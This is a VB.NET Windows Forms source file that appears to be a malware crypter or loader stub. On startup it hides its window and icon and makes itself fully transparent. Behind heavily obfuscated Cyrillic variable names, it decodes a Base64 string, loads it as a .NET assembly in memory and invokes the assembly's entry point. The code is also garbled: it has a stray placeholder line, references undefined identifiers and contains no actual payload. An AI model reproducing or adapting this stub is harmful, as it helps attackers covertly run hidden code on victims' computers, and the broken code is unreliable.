﻿Imports System.IO.Compression
Imports System.IO
Public Class Form1 
    Public Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
        Me.Hide()
        Me.ShowInTaskbar = False
        Me.ShowIcon = False
        Me.Opacity = 0
	    '███████████████████████████████
        '████╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬████
        '██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬███████╬╬╬╬╬╬╬╬╬███████╬╬╬█
        '█╬╬██╬╬╬╬███╬╬╬╬╬╬╬███╬╬╬╬██╬╬█
        '█╬██╬╬╬╬╬╬╬██╬╬╬╬╬██╬╬╬╬╬╬╬██╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬╬█████╬╬╬╬╬╬╬╬╬╬╬█████╬╬╬╬█
        '█╬╬█████████╬╬╬╬╬╬╬█████████╬╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█╬╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '█╬╬╬▓▓▓▓╬╬╬╬╬╬╬█╬╬╬╬╬╬╬▓▓▓▓╬╬╬█
        '█╬╬▓▓▓▓▓▓╬╬█╬╬╬█╬╬╬█╬╬▓▓▓▓▓▓╬╬█
        '█╬╬╬▓▓▓▓╬╬██╬╬╬█╬╬╬██╬╬▓▓▓▓╬╬╬█
        '█╬╬╬╬╬╬╬╬██╬╬╬╬█╬╬╬╬██╬╬╬╬╬╬╬╬█
        '█╬╬╬╬╬████╬╬╬╬███╬╬╬╬████╬╬╬╬╬█
        '█╬╬╬╬╬╬╬╬╬╬╬╬╬███╬╬╬╬╬╬╬╬╬╬╬╬╬█
        '██╬╬█╬╬╬╬╬╬╬╬█████╬╬╬╬╬╬╬╬█╬╬██
        '██╬╬██╬╬╬╬╬╬███████╬╬╬╬╬╬██╬╬██
        '██╬╬▓███╬╬╬████╬████╬╬╬███▓╬╬██
        '███╬╬▓▓███████╬╬╬███████▓▓╬╬███
        '███╬╬╬╬▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬███
        '████╬╬╬╬╬╬╬╬╬╬███╬╬╬╬╬╬╬╬╬╬████
        '█████╬╬╬╬╬╬╬╬╬╬█╬╬╬╬╬╬╬╬╬╬█████
        '██████╬╬╬╬╬╬╬╬███╬╬╬╬╬╬╬╬██████
        '███████╬╬╬╬╬╬╬███╬╬╬╬╬╬╬███████
        '████████╬╬╬╬╬╬███╬╬╬╬╬╬████████
        '█████████╬╬╬╬╬███╬╬╬╬╬█████████
        '███████████╬╬╬╬█╬╬╬╬███████████
        '███████████████████████████████
        іншыяффффіншыяффффіншыяффффіншыяффффіншыяффффіншыяфффф
        Dim францускагафілёзафафранцускагафілёзафафранцускагафілёзафафранцускагафілёзафа As String = ""
        Dim філёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафіл As Integer = філёзаффілёзаффілёзаффілёзаффілёзаффілёзаффілёзаффілёзаффілёзаффілёзаф1.Length
        Dim фафранцускагафілёзафаффафранцускагафілёзафаффафранцускагафілёзафаф As Integer = 1
        Do While (фафранцускагафілёзафаффафранцускагафілёзафаффафранцускагафілёзафаф <= філёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафілёзафафіл)
            францускагафілёзафафранцускагафілёзафафранцускагафілёзафафранцускагафілёзафа = сюджанысюджанысюджанысюджанысюджанысюджанысюджанысюджанысюджаны
            фафранцускагафілёзафаффафранцускагафілёзафаффафранцускагафілёзафаф += 1
        Loop
        Dim лёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафаф As Object = AppDomain.CurrentDomain.Load(Convert.FromBase64String(францускагафілёзафафранцускагафілёзафафранцускагафілёзафафранцускагафілёзафа))
        Dim лёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафаф As String = лёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафафлёзафаф.EntryPoint.Invoke(Nothing, Nothing)
    End Sub
	Public Function DecompressGZip(ByVal bytesToDecompress As Byte()) As Byte()
        Using stream = New GZipStream(New MemoryStream(bytesToDecompress), CompressionMode.Decompress)
            Const size As Integer = 4096
            Dim buffer = New Byte(size - 1) {}
            Using memoryStream = New IO.MemoryStream()
                Dim count As Integer
                Do
                    count = stream.Read(buffer, 0, size)
                    If count > 0 Then
                        memoryStream.Write(buffer, 0, count)
                    End If
                Loop While count > 0
                Return memoryStream.ToArray()
            End Using
        End Using
    End Function
End Class